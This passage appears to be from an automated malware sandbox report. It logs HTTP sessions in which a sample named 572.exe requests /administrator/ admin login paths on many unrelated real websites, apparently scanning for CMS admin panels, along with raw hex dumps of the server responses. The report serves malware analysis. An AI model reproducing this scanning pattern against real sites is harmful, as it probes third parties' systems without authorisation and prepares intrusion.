b2 c7 c0 0b 55 20 19 d6 e6 68 6a 1a 91 c1 34 72 22 34 29 bc 49 39 c2 e3 69 fa d8 c2 cf 24 cb 5b 6f c0 91 bc 90 6c 8e 3a 18 53 93 a9 4e 60 dd b0 41 ec 15 81 f6 76 5a aa f8 36 f9 39 ac b3 aa 29 49 82 52 90 59 5d 25 bc 88 3b 50 db 63 5b c8 5b d4 30 3c 00 b6 d7 d0 c1 0f b1 96 a5 5b c4 9c 4e a4 0c 78 03 75 d1 04 93 c6 fc 7c 56 53 4c 59 60 79 45 52 b4 49 a4 65 d3 43 d1 13 23 c8 f9 1f 9e 42 ae f6 d1 08 34 36 3f 86 a7 98 24 8a 93 bc d7 00 fc 38 ab 8a 2e 1a a2 22 4f 22 76 22 a6 16 11 3b 36 ae 16 a7 a8 a2 48 3e 59 dd b9 55 5d bd 8f 3a b5 db ae b5 e6 dc 11 56 55 d6 d4 a4 96 24 41 d4 55 09 97 26 91 ac c8 64 ca 4f 81 ed ac 00 a7 41 17 be 0b a9 4d de d2 b9 24 22 90 30 ff 5e ea 4e 7a 6d c5 d9 32 1b 76 e2 ed a2 db 16 d3 50 4a 8b c0 57 37 be 48 0d 45 ce 16 4d 59 32 7b c3 a5 7e a3 83 e3 b4 c8 0f 0f 7a 7d f1 41 6d 7d c3 da b9 7b 00 f4 45 11 a2 1c 4f 82 54 dd 20 f3 c5 9c 86 40 39 bf 6f d0 d5 d5 2d eb ca 97 07 40 5c 20 f2 67 39 40 13 04 b9 49 77 78 7a ae dc bb 5a 7d f9 e4 00 90 65 c5 08 d4 30 a5 39 3c a8 b5 f5 cd f2 f6 f5 ca da bf 0f 80 56 30 b1 5c 84 30 d5 97 39 37 88 0f 0f 79 f5 f1 ab f2 ee d3 03 c0 86 c5 56 72 a6 18 a4 e7 06 d9 e1 01 ae 2c 83 9e b7 2b cb ef ac d5 47 7d
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 89aY{oS,;lI.vmw} S$%]qqi;\<{Iv9Q+tdRDqH["wgg~;;3;4={?A9#/%7M0Sg`~N'$O[uzuZ69/<i$`8Nr8EJSUn`C91"a`FMv3Js2J*I0)L?2#hsXvHDGG#-#=/fd33(v6&[EV u&DursIs>b(qt:Tf5"%KX;M($AXWw$4+ZF,2 9#2,5VR{+]2]gP1/TaW(hX\$qE|:+"xdU hj4r"4)I9i$[ol:SN`AvZ69)IRY]%;Pc[[0<[Nxu|VSLY`yERIeC#B46?$8."O"v";6H>YU]:VU$AU&dOAM$"0^Nzm2vPJW7HEMY2{~z}Am}{EOT @9o-@\ g9@IwxzZ}e09<V0\097yVr,+G}
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.537220955 CET1280INData Raw: c3 96 15 81 b0 4e d6 c4 4b 22 3f cf 12 09 2c 44 c0 06 66 e7 49 29 c1 9c 4d fd e1 f7 73 7f 3a 93 9a 9d fe 94 f1 7a 2b 24 27 41 53 9c 07 7f f4 a4 5c 27 71 22 d2 e9 b0 dd a7 d9 1d ba 0d df 47 07 4b b7 aa 0f fe 66 6d ae 58 db 2f 02 79 74 57 4e 9c 83
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: NK"?,DfI)Ms:z+$'AS\'q"GKfmX/ytWNOh8O:2eH8ds")3/Hmos&`)uvqf!I:-AeIBP9dva?,(o]tI8I<3O*;<QjCn]h$2>Wnn
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.537242889 CET18INData Raw: 18 c4 89 c6 cf a9 ff 07 5c 9f 99 ea 60 1d 00 00 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: \`
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.537257910 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.542913914 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                171192.168.2.65505436.255.71.4580524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.816117048 CET179OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: instructory.net
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.192037106 CET153INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:55 GMT
                                                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                                                location: https://instructory.net/administrator/
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-cache


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                172192.168.2.655255185.120.71.2480524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.839792967 CET176OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: analvids.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.049164057 CET384INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 178
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: http://www.analvids.com/administrator/
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                173192.168.2.65536735.186.223.18080524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.901544094 CET185OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: sigapbanjarmasin.info
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.724751949 CET237INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Google Frontend
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.724770069 CET1286INData Raw: 64 33 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 57 6d 6f db 36 10 fe 3e 60 ff 41 e1 87 4e 6a 19 d5 4e ea 34 95 ab 0e 5d 5e ba 62 4b db b5 6b d7 2d 08 04 5a 3a db 4c 65 d2 23 29 3b 86 a2 ff be 23 25 d9 56 93 b6 29 b0 4f 3a 1d 8f 47 f2 f8 dc 73 c7
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: d3dWmo6>`ANjN4]^bKk-Z:Le#);#%V)O:GsS3)S*>7Y!&K`<\drz{w +`**S)?q6!*]Eeb\,j7ch#YbKDeO5Fr2PI*OM@?Tz
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.724802971 CET1286INData Raw: 56 68 b3 ca 41 4f 01 2c fe 6b 86 41 ec 25 8e 65 d0 ae 47 27 60 3c 47 3c 0e a6 2d 61 f9 41 43 89 1e 84 1d 26 b3 07 bc 75 02 96 8b c2 37 c1 cf 9f d9 c7 64 5d 7e 0c 25 94 04 6d 31 1a 07 11 21 71 1c 9b eb 6b 51 e4 b9 95 6e cc 1d 47 58 20 f2 f0 9f 00
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: VhAO,kA%eG'`<G<-aAC&u7d]~%m1!qkQnGX `9wdz?[r,#0erg$%HNOj>iQ=Xmw5f;RG<>v`$Vo8l6:nB6vw:-\:[pnuMQ_caN3
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.724834919 CET824INData Raw: 11 b0 0b bd fc 94 5d de aa 27 3e bb 7e 54 17 13 36 d0 7c f3 9c 3d 9c aa 27 92 05 cf ea 62 c6 a2 be ba 48 19 a8 28 b5 57 36 7f 55 17 21 7b fe a2 2e 22 f6 e2 a8 8b d1 fa 67 cc e3 50 8c 50 bb 86 25 ab a7 bb 14 14 53 4c bf 22 e7 f5 e8 53 2b c6 df ca
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ]'>~T6|='bH(W6U!{."gPP%SL"S+Q$N(6GVW!y5ZX 4Tgv2Dmb6v\Dgw/ $8(p$_Il~G@h>fD7~n&B
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.725110054 CET1286INData Raw: 31 30 30 30 0d 0a 7c 6b c8 87 4c 9d 96 f4 4c 0e 1f 43 d8 cb 5f 3b d9 f5 5f bc c8 9b 2b 84 9e f3 8f 66 1f 14 a5 eb 80 53 e5 39 c1 1b 30 ef 2e 64 95 0b 72 8e 0f 09 72 6e c5 6b 66 25 08 4a eb 38 a7 06 98 26 5a 50 b7 64 21 d5 55 05 c2 26 33 12 dd 09
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 1000|kLLC_;_+fS90.drrnkf%J8&ZPd!U&3C4K7^dj?w_?16(1#%iqyL4~Kj8c'!g1Y+[q%($}Y,B"$\`oc[3wUy00m`U.N6P_
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.725127935 CET1286INData Raw: 5d 9c ed 5d 8e e8 45 fe 23 5e 42 f1 34 2a ea a7 5b 26 8d 44 b3 c3 3b c4 6f b3 43 a2 70 f6 cc d6 92 e0 c9 e8 fe d6 58 83 03 a6 21 48 a1 c0 4e a9 e4 36 af 41 14 6c 8a 44 54 f0 4f 8c a1 48 c5 f9 d1 1e 4b 2c f4 cc 56 a6 a5 6b 4a 45 20 e5 29 e6 d5 2b
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ]]E#^B4*[&D;oCpX!HN6AlDTOHK,VkJE )+Vf^e4\/QT~mtT}5Gutq.$r$:vco&kjx]F|Lfn>=i__~}~h=IC]^]iV.~GG
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.725145102 CET1286INData Raw: e0 f5 b5 17 55 df b9 e8 a0 7f dc 93 fc 1e f2 34 11 49 ca 00 4a a0 43 81 6f 30 95 43 db 4e 47 61 68 d1 e1 55 a0 a8 46 a9 f4 70 61 34 c8 20 7c 7d ae 2d 97 61 0c 1d cf 92 0d c3 c4 84 17 39 94 94 f8 d6 52 69 ca 8c 98 07 49 b5 77 b7 ea 2f 1b 15 78 b7
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: U4IJCo0CNGahUFpa4 |}-a9RiIw/xfF3H1q%>.=xkm6nqlguqDcP@.}W/LH/M/'rTf/NkSg(yg.<XvxW&};{@lN;wQ,idFeW=
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.725161076 CET246INData Raw: 06 da 6f eb 24 c6 6b 06 a9 7b 13 ca 50 c4 35 3f 34 86 78 81 44 cf ee 05 09 2d b3 5a 3f 10 a9 46 da f6 ca a7 61 e0 d1 72 54 fb d4 03 4e 35 c8 92 39 a0 a7 50 d2 04 d5 ba 52 d6 79 5c ae cb fb d5 fa 16 0e e0 4d cc b6 81 08 03 7f 19 75 8a 85 10 42 4e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: o$k{P5?4xD-Z?FarTN59PRy\MuBNAj&0m)8#|!ff{d%=Gvuoq{"36>{|u>(=C-5T08/U!]qq\|^Z#2B3.8f]O`RaSVdq
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.725440025 CET791INData Raw: 33 31 30 0d 0a 43 92 cb f8 75 73 43 42 77 46 43 5a 52 13 23 a6 45 69 4a 6b 05 6e 7f 4b f0 a2 9f 1c 29 6e c2 68 27 79 ec 08 bd 4d ba 91 f9 e3 f4 cd c9 c9 a5 d0 3b 68 27 bb 57 c7 cb 5b 09 c7 c7 1f e8 84 38 ce 91 b8 4b 1e 9d 9b 33 d8 a6 1a f5 1b 0e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 310CusCBwFCZR#EiJknK)nh'yM;h'W[8K30JfkQ^@X`,J2?p-Q{*t|J^p[43ETinchxo/<jfVin3w!,'Xm-^f@KUf.sL/gW0.6t'2hS
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.725539923 CET1286INData Raw: 66 66 61 0d 0a 9c 9c 5b 6f db 46 10 85 ff 8a ad 27 0a a1 8d a0 01 8a c2 0a 6b c4 0d 9c 14 41 8b a0 68 2e ad 9f 18 85 b5 8c d8 52 23 5a aa 9d 26 ff bd df 99 bd 8d 28 c5 81 5b 14 88 cc cb 92 9c 9d 9d 39 73 66 66 83 68 86 61 c1 d7 e5 b2 7d e5 6e a1
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ffa[oF'kAh.R#Z&([9sffha}n$$A0!PRHac*J[VMC)/cA"sy(V;4S= ei'NEplwridM/Iv-$GOj`H.
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.826941967 CET1286INData Raw: 0a 01 2c a3 23 8f a5 35 67 c7 b6 3d a4 1e 1f 3e a1 cc 29 cb 6d 16 ba 06 50 17 d0 78 75 75 7c 15 b0 df 93 f1 d1 ea 78 55 f1 4f b5 6e 0e d6 f5 ed a1 ea c2 9b 35 10 90 65 25 f7 14 1e a8 b5 ee 1f 78 ce 38 61 95 5f 35 b4 6d 14 50 69 2b 77 9f 7d 2b f6
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ,#5g=>)mPxuu|xUOn5e%x8a_5mPi+w}+p~mr>;A|KC[p^_e[#GC&3??sew=vw8GfI:.]b]$@]a=_&M/!zf]:ezpWa
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.997791052 CET248OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: sigapbanjarmasin.info
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: http://sigapbanjarmasin.info/administrator/
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:55.986587048 CET237INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:55 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Google Frontend
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                174192.168.2.65537096.7.224.17880524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.905585051 CET234OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: naukrigulf.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: http://naukrigulf.com/administrator/
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.017050982 CET648INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                                                Server: AkamaiGHost
                                                                                                                                                                                                                                                                                                                                                                Mime-Version: 1.0
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 290
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Server-Timing: cdn-cache; desc=HIT
                                                                                                                                                                                                                                                                                                                                                                Server-Timing: edge; dur=1
                                                                                                                                                                                                                                                                                                                                                                Server-Timing: ak_p; desc="1707131690957_1611129006_213759812_14_9815_102_0_-";dur=1
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 48 31 3e 0a 20 0a 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 6e 61 75 6b 72 69 67 75 6c 66 26 23 34 36 3b 63 6f 6d 26 23 34 37 3b 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 22 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 50 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 31 38 26 23 34 36 3b 61 65 65 30 30 37 36 30 26 23 34 36 3b 31 37 30 37 31 33 31 36 39 30 26 23 34 36 3b 63 62 64 62 37 34 34 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <HTML><HEAD><TITLE>Access Denied</TITLE></HEAD><BODY><H1>Access Denied</H1> You don't have permission to access "http&#58;&#47;&#47;naukrigulf&#46;com&#47;administrator&#47;index&#46;php" on this server.<P>Reference&#32;&#35;18&#46;aee00760&#46;1707131690&#46;cbdb744</BODY></HTML>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                175192.168.2.655363172.66.43.11780524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.915935993 CET176OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: login.adf.ly
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.135803938 CET1286INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                                                                                                                                                                                                location: https://login.adf.ly/administrator/
                                                                                                                                                                                                                                                                                                                                                                x-turbo-charged-by: LiteSpeed
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YvdlzcHvjtW4prHJFlfOyFbLNrJHBS%2FK3sFVmO61nDHIzbACVd7bgJrCzeJktNJvusxfC%2Bpg8oNwWgTxb1wVR09RluX48NM8C852oxydUKwUT3mONPp6L%2BC9izF8Cng%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb6c88d44531-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 32 61 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 32 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 2ab<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.135821104 CET108INData Raw: 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.135835886 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:05.910253048 CET185OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: login.adf.ly
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.061811924 CET1286INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:05 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                                                                                                                                                                                                location: https://login.adf.ly/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                x-turbo-charged-by: LiteSpeed
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QNUOzSQcRawAISIQWns6riy1cSfV3UUEX489tQf7Vl%2Fsi2H4xLhd3Hvogco8GVmU2Y0tjf2UxHIPC0pY2wX6wtMWo7lwJRVrH%2BqD5glUmmRL1M%2FUBtNRaeptqpw7Ilk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd414dda4531-ATL
